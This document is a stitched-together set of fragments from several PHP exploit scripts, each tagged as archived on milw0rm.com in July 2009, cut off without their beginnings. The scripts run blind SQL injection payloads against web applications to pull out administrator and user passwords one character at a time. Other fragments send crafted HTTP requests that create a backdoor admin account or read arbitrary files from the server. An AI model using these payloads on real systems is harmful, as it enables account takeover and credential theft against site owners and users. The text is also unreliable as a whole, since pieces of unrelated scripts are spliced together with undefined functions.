if ($i == 60) {
$i = 98;
}
if ($j > 9) {
$hg = QABANDI($host1, $userdir1, $userid1, $username1, $userpass1, "' and ascii(substring((select Password from almnzm_moderators limit 0,1)," . $j . ",1)) > '" . $i);
}
if ($j <= 9) {
$hg = QABANDI($host1, $userdir1, $userid1, $username1, $userpass1, "' and ascii(substring((select Password from almnzm_moderators limit 0,1)," . $j . ",1))>'" . $i);
}
$laenge = strlen($hg);
if (abs(100 - $laenge / $r * 100) > $t - 1) {
if ($j > 9) {
$laenge = strlen(QABANDI($host1, $userdir1, $userid1, $username1, $userpass1, "' and ascii(substring((select Password from almnzm_moderators limit 0,1)," . $j . ",1)) > '" . ($i - 1)));
}
if ($j <= 9) {
$laenge = strlen(QABANDI($host1, $userdir1, $userid1, $username1, $userpass1, "' and ascii(substring((select Password from almnzm_moderators limit 0,1)," . $j . ",1))>'" . ($i - 1)));
}
if (abs(100 - $laenge / $r * 100) > $t - 1) {
echo chr($i - 1);
} else {
echo chr($i);
}
$i = 102;
}
}
}
}
?>
# milw0rm.com [2009-07-02]
}
}
for ($i = 1; $i <= 122; $i++) {
$qest = QAB_GET(QABANDI($host1, $userdir1, "' or ascii(substring((select password from songs_user limit 0,1),10,1))='" . $i));
if ($qest == $truths) {
echo chr($i);
}
}
for ($i = 1; $i <= 122; $i++) {
$qest = QAB_GET(QABANDI($host1, $userdir1, "' or ascii(substring((select password from songs_user limit 0,1),11,1))='" . $i));
if ($qest == $truths) {
echo chr($i);
}
}
for ($i = 1; $i <= 122; $i++) {
$qest = QAB_GET(QABANDI($host1, $userdir1, "' or ascii(substring((select password from songs_user limit 0,1),12,1))='" . $i));
if ($qest == $truths) {
echo chr($i);
}
}
for ($i = 1; $i <= 122; $i++) {
$qest = QAB_GET(QABANDI($host1, $userdir1, "' or ascii(substring((select password from songs_user limit 0,1),13,1))='" . $i));
if ($qest == $truths) {
echo chr($i);
}
}
echo "\n\n this exploit is made to give you the first 8 chars of username and first 13 of password";
?>
# milw0rm.com [2009-07-27]
//print $packet;
$o = @fsockopen($host, 80);
if (!$o) {
echo "\n[x] No response...\n";
die;
}
fputs($o, $packet);
while (!feof($o)) {
$data .= fread($o, 1024);
}
fclose($o);
$_404 = strstr($data, "HTTP/1.1 404 Not Found");
if (!empty($_404)) {
echo "\n[x] 404 Not Found... Make sure of path. \n";
die;
}
$_401 = strstr($data, "401 Authorization Required");
if (!empty($_401)) {
echo "\n[x] HTTP authentication detected! (mrakib jdar narry, maku faydeh) \n";
die;
}
echo "Admin created !\n\nUsername: qabandi\npassword: qabandi";
}
$host1 = $argv[1];
$userdir1 = $argv[2];
QABANDI($host1, $userdir1);
die;
?>
# milw0rm.com [2009-07-15]
$packet .= "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)\r\n";
$packet .= "Pragma: no-cache\r\n";
$packet .= "Connection: Close\r\n\r\n";
$o = @fsockopen($host, 80);
if (!$o) {
echo "\n[x] No response...\n";
die;
}
fputs($o, $packet);
while (!feof($o)) {
$data .= fread($o, 1024);
}
fclose($o);
$_404 = strstr($data, "HTTP/1.1 404 Not Found");
if (!empty($_404)) {
echo "\n[x] 404 Not Found... Make sure of path. \n";
die;
}
return $data;
}
$host1 = $argv[1];
$userdir1 = $argv[2];
$file = $argv[3];
if ($argc > 2) {
echo "Getting file Data....[i9bir]\n";
print_r(QABANDI($host1, $userdir1, $file));
}
?>
# milw0rm.com [2009-07-24]
}
}
for ($i = 46; $i <= 122; $i++) {
$ass = "' and ascii(substring((select admin_user from admin limit 0,1),8,1))='" . $i;
$zyklon = strlen(QABANDI($host1, $userdir1, $ass));
$zyklon = round($zyklon, -3);
if ($zyklon == $yes) {
echo chr($i);
}
}
for ($i = 46; $i <= 122; $i++) {
$ass = "' and ascii(substring((select admin_user from admin limit 0,1),9,1))='" . $i;
$zyklon = strlen(QABANDI($host1, $userdir1, $ass));
$zyklon = round($zyklon, -3);
if ($zyklon == $yes) {
echo chr($i);
}
}
for ($i = 46; $i <= 122; $i++) {
$ass = "' and ascii(substring((select admin_user from admin limit 0,1),10,1))='" . $i;
$zyklon = strlen(QABANDI($host1, $userdir1, $ass));
$zyklon = round($zyklon, -3);
if ($zyklon == $yes) {
echo chr($i);
}
}
die;
?>
# milw0rm.com [2009-07-14]